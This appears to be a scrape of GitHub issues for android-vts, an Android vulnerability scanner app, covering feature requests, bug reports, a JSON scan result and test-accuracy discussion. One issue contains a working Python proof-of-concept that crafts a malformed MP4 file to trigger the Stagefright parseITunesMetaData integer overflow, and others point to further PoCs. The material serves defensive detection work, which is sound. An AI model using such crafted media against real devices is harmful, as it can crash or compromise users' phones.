androidvts / android-vts Goto Github PK

It would be nice to be able to read the whole content of the error message : can you add a popup window when pressing an error or the result of a test ?

what do you think about after they scan the device the user can be prompted to share their results for research, with a checkbox/option to disable asking in the future.

we could have some info about how the info is shared (via an anonymous google form submission).

related to #6, #59

CVE-2015-1528 check always come back as failed on Kitkat version even if the proper patch is applied. The check is assuming index 8 and 9 are numFds and numInts; but in KK version (Android 4.4.4), index 6 and 7 are numFds and numInts.

• json on logcat and ask for gist?
• allow opt-in to share results back to us for research purposes?
• button to copy results to clipboard?

http://sites.utexas.edu/iso/2015/09/15/android-5-lockscreen-bypass/
this is patched by https://android.googlesource.com/platform/frameworks/base/+/8fba7e6931245a17215e0e740e78b45f6b66d590

One possible idea: Include an AXML in the application, open framework-res parse the relevant axml and check for the existence of android:maxLength="500"

https://gist.github.com/worawit/f6fb016997bdd6b9e414

https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c

#!/usr/bin/python

"""
Stagefright PoC for https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c
"""
from struct import pack

def create_box(atom_type, data):
    return pack("!I", len(data)+4+4) + atom_type + data


ftyp_atom = create_box("ftyp", "mp42\x00\x00\x00\x00mp42isom")


# Integer overflow in MPEG4Extractor::parseITunesMetaData() function
# moov.udta.meta.ilst.xxxx.data
data_atom = pack("!I", 1) + "data" + pack("!II", 1, 0xf)
anyx_atom = create_box("anyx", data_atom)
ilst_atom = create_box("ilst", anyx_atom)
meta_atom = create_box("meta", pack("!I", 0) + ilst_atom)
udta_atom = create_box("udta", meta_atom)
moov_atom = create_box("moov", udta_atom)

f = open('sf-itunes-poc.mp4', 'wb')
f.write(ftyp_atom + moov_atom)
f.write("A"*(3*1024*1024))
f.close()

Hi, I would like to know what means/what causes the "Test is hanging" result. Even with that, does it still means the device is not affected (green result)?

When starting the app, show a bigger search button in the middle of the screen. Right under the "Start the scan to get the results" message.

Improvement. When tapping it, make an animation to shrink it and move it to the lower-right corner of the screen where it's placed right now.

cc @ekristen. hit me up on chat for additional info

Great app for pointing to possible vulnerabilities.

Would be even greater if, for each vulnerability found, clicking on the vulnerability's description line would bring up more info about it as well as possible solutions to prevent its being exploited (try Secunia's PSI on your PC to see what I mean),

Thanks in advance for a prompt & positive attention to this matter,

Sincerely,

Eric Trattner

For some of the bugs, they are shallow enough in the function, where we can trigger the issue without necessarily causing memory corruption. Rather than crafting an mp4 and hoping that it crashes mediaserver, we can dlsym functions of the stagefright and logically check for the existence of bugs.

https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c

looks like you can dlsym status_t MPEG4Extractor::parseITunesMetaData(off64_t offset, size_t size) and check for this without crashing

you send in size = INT_MAX and see if you get ERROR_MALFORMED. if not, make sure mDataSource->readAt points to a function that returns -1 or whatever then you get ERROR_IO on unpatched rom

I suggest pulling tests for WeakSauce and StumpRoot until they can be re-written, as both will often cause false positives.

I'm really to rewrite them at some point in the future when time allows.

Investigate why : CVE-2015-1528/GraphicsBuffer Unflatten is returning unpatched on N5 M build

::

https://github.com/nowsecure/android-vts/blob/master/app/src/main/jni/graphics_into_overflow_test.c#L49

The phone reboots after launching the test. This may be related to the architecture. The,CPU is an intel ATOM.

Maybe add a notification item in the tray to check the application whenever a new check is added or the user updates their device.

Current v.9 from November 18, 2015 is used

On KENEKSI Fire 2 running Android 4.2.2 several errors 'Error running the test' occurs (see screenshot at http://snag.gy/QYdJH.jpg ).

We see 'Error running the test: Test error' for
CVE-2015-1539
CVE-2015-3824
CVE-2015-3828
sf-itunes-poc
and 'Error running the test: com.android.org.conscrypt.OpenSSLX509Certificate' for
CVE-2015-3825
Could it be fixed in the next versions?

Current v.6 from November 15, 2015 is used

On ARK Benefit S502 Plus on Android 5.1 'Error running the test CVE-2015-1538-1' occurs (see screenshot at http://snag.gy/MgkMo.jpg ). Could it be fixed in the next versions?

Sources, patches, impact of the bug would be useful information to be able to dig into, too.

{
"buildInfo": {
"fingerprint": "oneplus/aosp_bacon/bacon:6.0/MRA58K/hamster10251523:userdebug/test-keys",
"kernelVersion": "3.4.67-cyanogenmod-g8021b62",
"brand": "oneplus",
"manufacturer": "OnePlus",
"model": "A0001",
"release": "6.0",
"sdk": "23",
"id": "MRA58K",
"versionCode": 6,
"versionName": "v.6"
},
"results": [
{
"name": "ZipBug 9950697",
"isVulnerable": false
},
{
"name": "ZipBug 8219321",
"isVulnerable": false
},
{
"name": "ZipBug 9695860",
"isVulnerable": false
},
{
"name": "CVE-2013-6282",
"isVulnerable": false
},
{
"name": "CVE-2011-1149",
"isVulnerable": false
},
{
"name": "CVE-2014-3153",
"isVulnerable": false
},
{
"name": "CVE-2014-4943",
"isVulnerable": false
},
{
"name": "CVE-2015-1528",
"isVulnerable": false
},
{
"name": "CVE-2015-1538-1",
"isVulnerable": false,
"exception": "java.io.IOException: Error running exec(). Command: [/data/user/0/com.nowsecure.android.vts/files/crashCheck-pie, 5, /data/user/0/com.nowsecure.android.vts/files/stagefrightCheck-pie, /data/user/0/com.nowsecure.android.vts/files/CVE-2015-1538-1.mp4] Working Directory: null Environment: null"
},
{
"name": "CVE-2015-1538-2",
"isVulnerable": false
},
{
"name": "CVE-2015-1538-3",
"isVulnerable": false
},
{
"name": "CVE-2015-1538-4",
"isVulnerable": false
},
{
"name": "CVE-2015-1539",
"isVulnerable": false
},
{
"name": "CVE-2015-3824",
"isVulnerable": false
},
{
"name": "CVE-2015-3828",
"isVulnerable": false
},
{
"name": "CVE-2015-3829",
"isVulnerable": false
},
{
"name": "CVE-2015-3864",
"isVulnerable": false
},
{
"name": "sf-itunes-poc",
"isVulnerable": false
},
{
"name": "CVE-2015-6602",
"isVulnerable": false
},
{
"name": "CVE-2015-3825",
"isVulnerable": false
},
{
"name": "CVE-2015-3636",
"isVulnerable": false
},
{
"name": "CVE-2015-7888",
"isVulnerable": false
}
]
}

The way this bug was patched, it seems very difficult to test for without causing system instability. Any ideas/insight here would be greatly appreciated.

Overview

We are asking that you update your Repo to address the issues below. If this Repo is no longer being used please indicate that in a comment below.

• Add more instruction to your README.md.
• Add a build badge to your README.md.
• Add a dependencies badge to your README.md (npm-dm.nowsecure.io).
• Your repo does not have any tests. Add your tests as well as what framework you are using.
• Update your dependencies.

AndroidVTS currently only works on ARM. Make sure that it runs properly on ARM64/x86.

That's a bit anoying on tablet-laptop devices like the ASUS transformer

you may want to have it put up a blue or yellow ribbon in the UI when a test fails so we can investigate those phones and fix the test

https://android.googlesource.com/platform/system/core.git/+/6b667fddeb871338ac7b42d2a005f3d933004e15

There looks to be a (non-functioning) test here: https://android.googlesource.com/platform/system/core.git/+/6b667fddeb871338ac7b42d2a005f3d933004e15%5E%21/#F17

Rather than running the suite onCreate, maybe trigger the running via a button or something

Hi !

Thanks for the new update, it's nice to have some information about the issues.
But the new yellow color for failed test isn't very readable, maybe orange ?

W/PackageParser( 3605): Unable to read AndroidManifest.xml of /data/local/tmp/VulnChecker.apk
W/PackageParser( 3605): java.io.FileNotFoundException: AndroidManifest.xml

Ideally, that short description should include a link to the CVE, the risks (local, remote priviledge escalation,..), and some suggestions to fix it if possible, or when this bug was fixed. Ideally we should keep track of all the devices and manufacturers in order to show if there are system updates or estimated times for the fix to come. And maybe a way to report those issues to the phone manufacturer.

When Android decides our app is no longer important, it gets marshalled/serialized and stored to free up resources for other apps the user is using. It is up to our app to catch the onSaveInstanceState() and save the ui, then restore the Bundle in onCreate().

To trigger the bug, you can open the app, run a scan, then use a bunch of other apps for a while. Then pull up VTS again and view the empty UI.

Alternately, you can enable developer options and enable the 'Dont keep activities' option. Perform a scan in VTS, press the home button to leave the app, and come back to the app.

You can see that the "scan" button is missing, along with most of the UI. There's no easy way for the user to 'go back' to the starting screen and perform a scan.

In some cases we have native executables that are run outside of JNI for one reason or another. The build system should handle automatically building and dropping these into assets/

This particular test causes a native crash. We need to wrap this test in something that can monitor the sub process for a crash (and account for execution hangs, etc).

:: e8baf75

This will cause the vulnerable items to 'bubble' up to the top at the same time showing the most relevant CVEs first.

Nexus 6 Build number LVY48E
Android 5.1.1

When installing the apk found at this link https://github.com/nowsecure/android-vts/tree/master/bin
I receive the following message in a pop up dialog:

Parse error

There was a problem parsing the package.

ADB logcat output:
D/ (27741): Zip: EOCD not found, /storage/emulated/0/Download/VulnChecker.apk is not zip
W/zipro (27741): Error opening archive /storage/emulated/0/Download/VulnChecker.apk: Invalid file
D/asset (27741): failed to open Zip archive '/storage/emulated/0/Download/VulnChecker.apk'
W/PackageInstaller(27741): Parse error when parsing manifest. Discontinuing installation

My apologies if I missed it, but I can't seem to find the license this code is released under. It'd be great if there was an explicit license file :)

cve-2015-1538-2 seems to cause a hang ... and because there is no timeout on the exec, it causes the whole app to hang.

Since people are using this to screenshot things, it would be nice to get build version, kernel version, device model, etc.. and show it on screen along with the device vuln info.

There are a subset of vulnerabilities which require elevated permissions to execute, for example cve-2014-4322 which is a system->root : https://github.com/laginimaineb/cve-2014-4322/blob/master/Feud/jni/main.c

If the device is rooted, we can check for some of these system -> roots

external_links is shown for both additional info and patches

Currently VTS only works properly on ARM. We should have checks to make sure that we are running on an ARM arch.

Great work!

One minor issue: I had an error compiling because "Stagefright.java" (app/src/main/java/fuzion24/device/vulnerability/vulnerabilities/framework/media/Stagefright.java) should be "StageFright.java" because the class is named StageFright.

I'd submit a pull request but I'm having trouble getting git to recognize that I changed the file name as it appears to not recognize case changes, maybe you can figure out how to do that. :-)

https://github.com/secmob/PoCForCVE-2015-1528

https://twitter.com/chrmhoffmann/status/666361775772868609

Play store description says that we only support android 4.0.3 and higher. We include a test for psneuter, which was fixed in android 2.3.X. it would take a special kind of screwup somewhere for this test to ever come up as 'failed'.

On @dweinstein's zte-d830, this check is improperly showing as patched.
After taking a look at conscrypt.odex, it is definitely not patched (mContext not marked as transient):

public class OpenSSLX509Certificate extends X509Certificate {
    private final long mContext;

    OpenSSLX509Certificate(long ctx) {
        super();
        this.mContext = ctx;
    }
}